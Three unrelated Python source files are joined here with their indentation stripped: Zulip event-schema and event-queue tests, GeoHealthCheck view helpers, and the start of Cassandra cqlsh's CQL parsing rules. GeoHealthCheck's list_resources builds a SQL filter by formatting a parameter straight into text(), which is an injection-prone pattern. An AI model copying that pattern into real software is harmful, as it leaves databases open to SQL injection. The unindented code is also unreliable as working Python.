events = self.do_test(lambda: do_set_realm_name(self.user_profile.realm, 'New Realm Name'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_restricted_to_domain(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('restricted_to_domain')),
('value', check_bool),
])
# The first True is probably a noop, then we get transitions in both directions.
for restricted_to_domain in (True, False, True):
events = self.do_test(lambda: do_set_realm_restricted_to_domain(self.user_profile.realm, restricted_to_domain))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_invite_required(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('invite_required')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for invite_required in (False, True, False):
events = self.do_test(lambda: do_set_realm_invite_required(self.user_profile.realm, invite_required))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_authentication_methods(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update_dict')),
('property', equals('default')),
('data', check_dict([])),
])
# Test transitions; any new backends should be tested with T/T/T/F/T
for (auth_method_dict) in \
({'Google': True, 'Email': True, 'GitHub': True, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': True, 'GitHub': False, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': False},
{'Google': False, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': True},
{'Google': False, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': True},
{'Google': False, 'Email': True, 'GitHub': True, 'LDAP': True, 'Dev': False}):
events = self.do_test(lambda: do_set_realm_authentication_methods(self.user_profile.realm,
auth_method_dict))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_invite_by_admins_only(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('invite_by_admins_only')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for invite_by_admins_only in (False, True, False):
events = self.do_test(lambda: do_set_realm_invite_by_admins_only(self.user_profile.realm, invite_by_admins_only))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_default_language(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('default_language')),
('value', check_string),
])
events = self.do_test(lambda: do_set_realm_default_language(self.user_profile.realm, 'de'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_create_stream_by_admins_only(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('create_stream_by_admins_only')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for create_stream_by_admins_only in (False, True, False):
events = self.do_test(lambda: do_set_realm_create_stream_by_admins_only(self.user_profile.realm,
create_stream_by_admins_only))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_pin_stream(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('update')),
('property', equals('pin_to_top')),
('value', check_bool),
])
stream = "Denmark"
sub = get_subscription(stream, self.user_profile)
# The first False is probably a noop, then we get transitions in both directions.
for pinned in (False, True, False):
events = self.do_test(lambda: do_change_subscription_property(self.user_profile, sub, stream, "pin_to_top", pinned))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_message_edit_settings(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update_dict')),
('property', equals('default')),
('data', check_dict([('allow_message_editing', check_bool),
('message_content_edit_limit_seconds', check_int)])),
])
# Test every transition among the four possibilities {T,F} x {0, non-0}
for (allow_message_editing, message_content_edit_limit_seconds) in \
((True, 0), (False, 0), (True, 0), (False, 1234), (True, 0), (True, 1234), (True, 0),
(False, 0), (False, 1234), (False, 0), (True, 1234), (False, 0),
(True, 1234), (True, 600), (False, 600), (False, 1234), (True, 600)):
events = self.do_test(lambda: do_set_realm_message_editing(self.user_profile.realm,
allow_message_editing, message_content_edit_limit_seconds))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_is_admin(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_user')),
('op', equals('update')),
('person', check_dict([
('email', check_string),
('is_admin', check_bool),
])),
])
# The first False is probably a noop, then we get transitions in both directions.
for is_admin in [False, True, False]:
events = self.do_test(lambda: do_change_is_admin(self.user_profile, is_admin))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_twenty_four_hour_time(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_display_settings')),
('setting_name', equals('twenty_four_hour_time')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_twenty_four_hour_time(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_left_side_userlist(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_display_settings')),
('setting_name', equals('left_side_userlist')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_left_side_userlist(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_stream_desktop_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_stream_desktop_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_stream_desktop_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_stream_sounds(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_stream_sounds')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_stream_sounds(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_desktop_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_desktop_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_desktop_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_sounds(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_sounds')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_sounds(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_offline_email_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_offline_email_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_offline_email_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_offline_push_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_offline_push_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_offline_push_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_online_push_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_online_push_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_online_push_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_pm_content_in_desktop_notifications(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('pm_content_in_desktop_notifications')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_pm_content_in_desktop_notifications(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_enable_digest_emails(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('update_global_notifications')),
('notification_name', equals('enable_digest_emails')),
('user', check_string),
('setting', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for setting_value in [False, True, False]:
events = self.do_test(lambda: do_change_enable_digest_emails(self.user_profile, setting_value))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_realm_emoji_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_emoji')),
('op', equals('update')),
('realm_emoji', check_dict([])),
])
events = self.do_test(lambda: check_add_realm_emoji(get_realm("zulip"), "my_emoji",
"https://realm.com/my_emoji"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
events = self.do_test(lambda: do_remove_realm_emoji(get_realm("zulip"), "my_emoji"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_realm_filter_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_filters')),
('realm_filters', check_list(None)), # TODO: validate tuples in the list
])
events = self.do_test(lambda: do_add_realm_filter(get_realm("zulip"), "#(?P<id>[123])",
"https://realm.com/my_realm_filter/%(id)s"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
self.do_test(lambda: do_remove_realm_filter(get_realm("zulip"), "#(?P<id>[123])"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_realm_alias_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_domains')),
('op', equals('add')),
('alias', check_dict([
('id', check_int),
('domain', check_string),
])),
])
realm = get_realm('zulip')
events = self.do_test(lambda: do_add_realm_alias(realm, 'zulip.org'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
schema_checker = check_dict([
('type', equals('realm_domains')),
('op', equals('remove')),
('alias_id', check_int),
])
alias_id = RealmAlias.objects.get(realm=realm, domain='zulip.org').id
events = self.do_test(lambda: do_remove_realm_alias(realm, alias_id))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_create_bot(self):
# type: () -> None
bot_created_checker = check_dict([
('type', equals('realm_bot')),
('op', equals('add')),
('bot', check_dict([
('email', check_string),
('user_id', check_int),
('full_name', check_string),
('api_key', check_string),
('default_sending_stream', check_none_or(check_string)),
('default_events_register_stream', check_none_or(check_string)),
('default_all_public_streams', check_bool),
('avatar_url', check_string),
])),
])
action = lambda: self.create_bot('test-bot@zulip.com')
events = self.do_test(action)
error = bot_created_checker('events[1]', events[1])
self.assert_on_error(error)
def test_change_bot_full_name(self):
# type: () -> None
action = lambda: do_change_full_name(self.bot, 'New Bot Name')
events = self.do_test(action)
error = self.realm_bot_schema('full_name', check_string)('events[1]', events[1])
self.assert_on_error(error)
def test_regenerate_bot_api_key(self):
# type: () -> None
action = lambda: do_regenerate_api_key(self.bot)
events = self.do_test(action)
error = self.realm_bot_schema('api_key', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_avatar_source(self):
# type: () -> None
action = lambda: do_change_avatar_source(self.bot, self.bot.AVATAR_FROM_USER)
events = self.do_test(action)
error = self.realm_bot_schema('avatar_url', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_all_public_streams(self):
# type: () -> None
action = lambda: do_change_default_all_public_streams(self.bot, True)
events = self.do_test(action)
error = self.realm_bot_schema('default_all_public_streams', check_bool)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_sending_stream(self):
# type: () -> None
stream = get_stream("Rome", self.bot.realm)
action = lambda: do_change_default_sending_stream(self.bot, stream)
events = self.do_test(action)
error = self.realm_bot_schema('default_sending_stream', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_change_bot_default_events_register_stream(self):
# type: () -> None
stream = get_stream("Rome", self.bot.realm)
action = lambda: do_change_default_events_register_stream(self.bot, stream)
events = self.do_test(action)
error = self.realm_bot_schema('default_events_register_stream', check_string)('events[0]', events[0])
self.assert_on_error(error)
def test_do_deactivate_user(self):
# type: () -> None
bot_deactivate_checker = check_dict([
('type', equals('realm_bot')),
('op', equals('remove')),
('bot', check_dict([
('email', check_string),
('full_name', check_string),
])),
])
bot = self.create_bot('foo-bot@zulip.com')
action = lambda: do_deactivate_user(bot)
events = self.do_test(action)
error = bot_deactivate_checker('events[1]', events[1])
self.assert_on_error(error)
def test_rename_stream(self):
# type: () -> None
realm = get_realm('zulip')
stream = self.make_stream('old_name')
new_name = u'stream with a brand new name'
self.subscribe_to_stream(self.user_profile.email, stream.name)
action = lambda: do_rename_stream(realm, stream.name, new_name)
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('email_address')),
('value', check_string),
('name', equals('old_name')),
])
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('name')),
('value', equals(new_name)),
('name', equals('old_name')),
])
error = schema_checker('events[1]', events[1])
self.assert_on_error(error)
def test_deactivate_stream_neversubscribed(self):
# type: () -> None
stream = self.make_stream('old_name')
action = lambda: do_deactivate_stream(stream)
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('stream')),
('op', equals('delete')),
('streams', check_list(check_dict([]))),
])
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_subscribe_other_user_never_subscribed(self):
# type: () -> None
action = lambda: self.subscribe_to_stream("othello@zulip.com", u"test_stream")
events = self.do_test(action)
schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_add')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
error = schema_checker('events[2]', events[2])
self.assert_on_error(error)
def test_subscribe_events(self):
# type: () -> None
subscription_schema_checker = check_list(
check_dict([
('color', check_string),
('description', check_string),
('email_address', check_string),
('invite_only', check_bool),
('in_home_view', check_bool),
('name', check_string),
('desktop_notifications', check_bool),
('audible_notifications', check_bool),
('stream_id', check_int),
('subscribers', check_list(check_int)),
])
)
add_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('add')),
('subscriptions', subscription_schema_checker),
])
remove_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('remove')),
('subscriptions', check_list(
check_dict([
('name', equals('test_stream')),
('stream_id', check_int),
]),
)),
])
peer_add_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_add')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
peer_remove_schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('peer_remove')),
('user_id', check_int),
('subscriptions', check_list(check_string)),
])
stream_update_schema_checker = check_dict([
('type', equals('stream')),
('op', equals('update')),
('property', equals('description')),
('value', check_string),
('name', check_string),
])
action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream") # type: Callable
events = self.do_test(action, event_types=["subscription", "realm_user"])
error = add_schema_checker('events[0]', events[0])
self.assert_on_error(error)
action = lambda: self.subscribe_to_stream("othello@zulip.com", "test_stream")
events = self.do_test(action)
error = peer_add_schema_checker('events[0]', events[0])
self.assert_on_error(error)
stream = get_stream("test_stream", self.user_profile.realm)
action = lambda: bulk_remove_subscriptions(
[get_user_profile_by_email("othello@zulip.com")],
[stream])
events = self.do_test(action)
error = peer_remove_schema_checker('events[0]', events[0])
self.assert_on_error(error)
action = lambda: bulk_remove_subscriptions(
[get_user_profile_by_email("hamlet@zulip.com")],
[stream])
events = self.do_test(action)
error = remove_schema_checker('events[1]', events[1])
self.assert_on_error(error)
action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream")
events = self.do_test(action)
error = add_schema_checker('events[1]', events[1])
self.assert_on_error(error)
action = lambda: do_change_stream_description(get_realm('zulip'), 'test_stream', u'new description')
events = self.do_test(action)
error = stream_update_schema_checker('events[0]', events[0])
self.assert_on_error(error)
class FetchInitialStateDataTest(ZulipTestCase):
# Non-admin users don't have access to all bots
def test_realm_bots_non_admin(self):
# type: () -> None
email = 'cordelia@zulip.com'
user_profile = get_user_profile_by_email(email)
self.assertFalse(user_profile.is_realm_admin)
result = fetch_initial_state_data(user_profile, None, "")
self.assert_length(result['realm_bots'], 0)
# additionally the API key for a random bot is not present in the data
api_key = get_user_profile_by_email('notification-bot@zulip.com').api_key
self.assertNotIn(api_key, str(result))
# Admin users have access to all bots in the realm_bots field
def test_realm_bots_admin(self):
# type: () -> None
email = 'hamlet@zulip.com'
user_profile = get_user_profile_by_email(email)
do_change_is_admin(user_profile, True)
self.assertTrue(user_profile.is_realm_admin)
result = fetch_initial_state_data(user_profile, None, "")
self.assertTrue(len(result['realm_bots']) > 5)
class EventQueueTest(TestCase):
def test_one_event(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "pointer",
"pointer": 1,
"timestamp": "1"})
self.assertFalse(queue.empty())
self.assertEqual(queue.contents(),
[{'id': 0,
'type': 'pointer',
"pointer": 1,
"timestamp": "1"}])
def test_event_collapsing(self):
# type: () -> None
queue = EventQueue("1")
for pointer_val in range(1, 10):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
self.assertEqual(queue.contents(),
[{'id': 8,
'type': 'pointer',
"pointer": 9,
"timestamp": "9"}])
queue = EventQueue("2")
for pointer_val in range(1, 10):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
queue.push({"type": "unknown"})
queue.push({"type": "restart", "server_generation": "1"})
for pointer_val in range(11, 20):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
queue.push({"type": "restart", "server_generation": "2"})
self.assertEqual(queue.contents(),
[{"type": "unknown",
"id": 9},
{'id': 19,
'type': 'pointer',
"pointer": 19,
"timestamp": "19"},
{"id": 20,
"type": "restart",
"server_generation": "2"}])
for pointer_val in range(21, 23):
queue.push({"type": "pointer",
"pointer": pointer_val,
"timestamp": str(pointer_val)})
self.assertEqual(queue.contents(),
[{"type": "unknown",
"id": 9},
{'id': 19,
'type': 'pointer',
"pointer": 19,
"timestamp": "19"},
{"id": 20,
"type": "restart",
"server_generation": "2"},
{'id': 22,
'type': 'pointer',
"pointer": 22,
"timestamp": "22"},
])
def test_flag_add_collapsing(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "update_message_flags",
"flag": "read",
"operation": "add",
"all": False,
"messages": [1, 2, 3, 4],
"timestamp": "1"})
queue.push({"type": "update_message_flags",
"flag": "read",
"all": False,
"operation": "add",
"messages": [5, 6],
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 1,
'type': 'update_message_flags',
"all": False,
"flag": "read",
"operation": "add",
"messages": [1, 2, 3, 4, 5, 6],
"timestamp": "1"}])
def test_flag_remove_collapsing(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "update_message_flags",
"flag": "collapsed",
"operation": "remove",
"all": False,
"messages": [1, 2, 3, 4],
"timestamp": "1"})
queue.push({"type": "update_message_flags",
"flag": "collapsed",
"all": False,
"operation": "remove",
"messages": [5, 6],
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 1,
'type': 'update_message_flags',
"all": False,
"flag": "collapsed",
"operation": "remove",
"messages": [1, 2, 3, 4, 5, 6],
"timestamp": "1"}])
def test_collapse_event(self):
# type: () -> None
queue = EventQueue("1")
queue.push({"type": "pointer",
"pointer": 1,
"timestamp": "1"})
queue.push({"type": "unknown",
"timestamp": "1"})
self.assertEqual(queue.contents(),
[{'id': 0,
'type': 'pointer',
"pointer": 1,
"timestamp": "1"},
{'id': 1,
'type': 'unknown',
"timestamp": "1"}])
class TestEventsRegisterAllPublicStreamsDefaults(TestCase):
def setUp(self):
# type: () -> None
self.email = 'hamlet@zulip.com'
self.user_profile = get_user_profile_by_email(self.email)
def test_use_passed_all_public_true_default_false(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, True)
self.assertTrue(result)
def test_use_passed_all_public_true_default(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, True)
self.assertTrue(result)
def test_use_passed_all_public_false_default_false(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, False)
self.assertFalse(result)
def test_use_passed_all_public_false_default_true(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, False)
self.assertFalse(result)
def test_use_true_default_for_none(self):
# type: () -> None
self.user_profile.default_all_public_streams = True
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, None)
self.assertTrue(result)
def test_use_false_default_for_none(self):
# type: () -> None
self.user_profile.default_all_public_streams = False
self.user_profile.save()
result = _default_all_public_streams(self.user_profile, None)
self.assertFalse(result)
class TestEventsRegisterNarrowDefaults(TestCase):
def setUp(self):
# type: () -> None
self.email = 'hamlet@zulip.com'
self.user_profile = get_user_profile_by_email(self.email)
self.stream = get_stream('Verona', self.user_profile.realm)
def test_use_passed_narrow_no_default(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = None
self.user_profile.save()
result = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
self.assertEqual(result, [[u'stream', u'my_stream']])
def test_use_passed_narrow_with_default(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = self.stream.id
self.user_profile.save()
result = _default_narrow(self.user_profile, [[u'stream', u'my_stream']])
self.assertEqual(result, [[u'stream', u'my_stream']])
def test_use_default_if_narrow_is_empty(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = self.stream.id
self.user_profile.save()
result = _default_narrow(self.user_profile, [])
self.assertEqual(result, [[u'stream', u'Verona']])
def test_use_narrow_if_default_is_none(self):
# type: () -> None
self.user_profile.default_events_register_stream_id = None
self.user_profile.save()
result = _default_narrow(self.user_profile, [])
self.assertEqual(result, [])
| |
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import models
import util
from sqlalchemy import text
from plugin import Plugin
from factory import Factory
from init import App
APP = App.get_app()
LOGGER = logging.getLogger(__name__)
def list_resources(resource_type=None, query=None, tag=None):
"""return all resources"""
reliability_values = []
first_run = None
last_run = None
response = {
'total': 0,
'success': {
'number': 0,
'percentage': 0
},
'fail': {
'number': 0,
'percentage': 0
},
'first_run': None,
'last_run': None,
'reliability': 0
}
filters = ()
if resource_type is not None:
filters = filters + (text("resource_type = '%s'" % resource_type),)
if query is not None:
field, term = get_query_field_term(query)
filters = filters + (field.ilike(term),)
if tag is not None:
tag_filter = (models.Resource.tags.any(models.Tag.name.in_([tag])),)
filters = filters + tag_filter
response['resources'] = models.Resource.query.filter(*filters).all()
response['total'] = len(response['resources'])
response['success']['percentage'] = 0
response['fail']['percentage'] = 0
response['reliability'] = 0
for resource in response['resources']:
if resource.run_count > 0:
# View should work even without Runs
if first_run is None or resource.first_run < first_run:
first_run = resource.first_run
if last_run is None or resource.last_run < last_run:
last_run = resource.last_run
response['first_run'] = first_run
response['last_run'] = last_run
if resource.last_run.success:
response['success']['number'] += 1
else:
response['fail']['number'] += 1
reliability_values.append(resource.reliability)
response['success']['percentage'] = int(round(util.percentage(
response['success']['number'], response['total'])))
response['fail']['percentage'] = 100 - response['success']['percentage']
response['reliability'] = round(util.average(reliability_values), 1)
return response
def get_resource_by_id(identifier):
"""return one resource by identifier"""
return models.Resource.query.filter_by(
identifier=identifier).first_or_404()
def get_run_by_id(identifier):
"""return one Run by identifier"""
return models.Run.query.filter_by(
identifier=identifier).first_or_404()
def get_run_by_resource_id(identifier):
"""return one Run by identifier"""
return models.Run.query.filter_by(
resource_identifier=identifier)
def get_resource_types_counts():
"""return frequency counts of registered resource types"""
mrt = models.get_resource_types_counts()
return {
'counts': mrt[0],
'total': mrt[1]
}
def get_health_summary():
"""return summary of all runs"""
# For overall reliability
total_runs = models.get_runs_count()
failed_runs = models.get_runs_status_count(False)
success_runs = total_runs - failed_runs
# Resources status derived from last N runs
total_resources = models.get_resources_count()
last_runs = models.get_last_run_per_resource()
failed = 0
failed_resources = []
for run in last_runs:
if not run.success:
failed_resources.append(
get_resource_by_id(run.resource_identifier))
failed += 1
success = total_resources - failed
failed_percentage = int(round(
util.percentage(failed, total_resources)))
success_percentage = 100 - failed_percentage
response = {
'site_url': APP.config['GHC_SITE_URL'],
'total': total_resources,
'success': {
'number': success,
'percentage': success_percentage
},
'fail': {
'number': failed,
'percentage': failed_percentage
},
'first_run': models.get_first_run(),
'last_run': models.get_last_run(),
'reliability': round(util.percentage(success_runs, total_runs), 1),
'failed_resources': failed_resources
}
return response
def get_tag_counts():
"""return all tag counts"""
return models.get_tag_counts()
def get_query_field_term(query):
"""determine query context from q="""
field = models.Resource.title # default
try:
facet, term = query.split(':')
term2 = '%%%s%%' % term # default like
if facet == 'url':
field = models.Resource.url
elif facet == 'title':
field = models.Resource.title
elif facet == 'site':
field = models.Resource.url
term2 = '%%%s/%%' % term
elif facet == 'owner':
field = models.Resource.owner_identifier
term = term2
except ValueError: # default search
term = '%%%s%%' % query
return [field, term]
def get_probes_avail(resource_type=None, resource=None):
"""
Get all available Probes with their attributes.
:param resource_type: optional resource type e.g. OGC:WMS
:param resource: optional Resource instance
:return:
"""
# Assume no resource type
filters = None
if resource_type:
filters = [('RESOURCE_TYPE', resource_type),
('RESOURCE_TYPE', '*:*')]
probe_classes = Plugin.get_plugins('GeoHealthCheck.probe.Probe', filters)
result = dict()
for probe_class in probe_classes:
probe = Factory.create_obj(probe_class)
if probe:
if resource:
try:
probe._resource = resource
probe.expand_params(resource)
except Exception as err:
msg = 'Cannot expand plugin vars for %s err=%s' \
% (probe_class, repr(err))
LOGGER.warning(msg)
result[probe_class] = probe.get_plugin_vars()
return result
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# code for dealing with CQL's syntax, rules, interpretation
# i.e., stuff that's not necessarily cqlsh-specific
import re
import traceback
from . import pylexotron, util, helptopics
from cql import cqltypes
Hint = pylexotron.Hint
SYSTEM_KEYSPACES = ('system',)
cqldocs = helptopics.CQL2HelpTopics()
class CqlParsingRuleSet(pylexotron.ParsingRuleSet):
keywords = set((
'select', 'from', 'where', 'and', 'key', 'insert', 'update', 'with',
'limit', 'using', 'consistency', 'one', 'quorum', 'all', 'any',
'local_quorum', 'each_quorum', 'two', 'three', 'use', 'count', 'set',
'begin', 'apply', 'batch', 'truncate', 'delete', 'in', 'create',
'keyspace', 'schema', 'columnfamily', 'table', 'index', 'on', 'drop',
'primary', 'into', 'values', 'timestamp', 'ttl', 'alter', 'add', 'type',
'first', 'reversed'
))
columnfamily_options = (
# (CQL option name, Thrift option name (or None if same))
('comment', None),
('comparator', 'comparator_type'),
('read_repair_chance', None),
('gc_grace_seconds', None),
('default_validation', 'default_validation_class'),
('min_compaction_threshold', None),
('max_compaction_threshold', None),
('replicate_on_write', None),
('compaction_strategy_class', 'compaction_strategy'),
('populate_io_cache_on_flush', None),
)
obsolete_cf_options = (
('key_cache_size', None),
('row_cache_size', None),
('row_cache_save_period_in_seconds', None),
('key_cache_save_period_in_seconds', None),
('memtable_throughput_in_mb', None),
('memtable_operations_in_millions', None),
('memtable_flush_after_mins', None),
('row_cache_provider', None),
)
all_columnfamily_options = columnfamily_options + obsolete_cf_options
columnfamily_map_options = (
('compaction_strategy_options', None,
()),
('compression_parameters', 'compression_options',
('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
)
available_compression_classes = (
'DeflateCompressor',
'SnappyCompressor',
)
available_compaction_classes = (
'LeveledCompactionStrategy',
'SizeTieredCompactionStrategy'
)
replication_strategies = (
'SimpleStrategy',
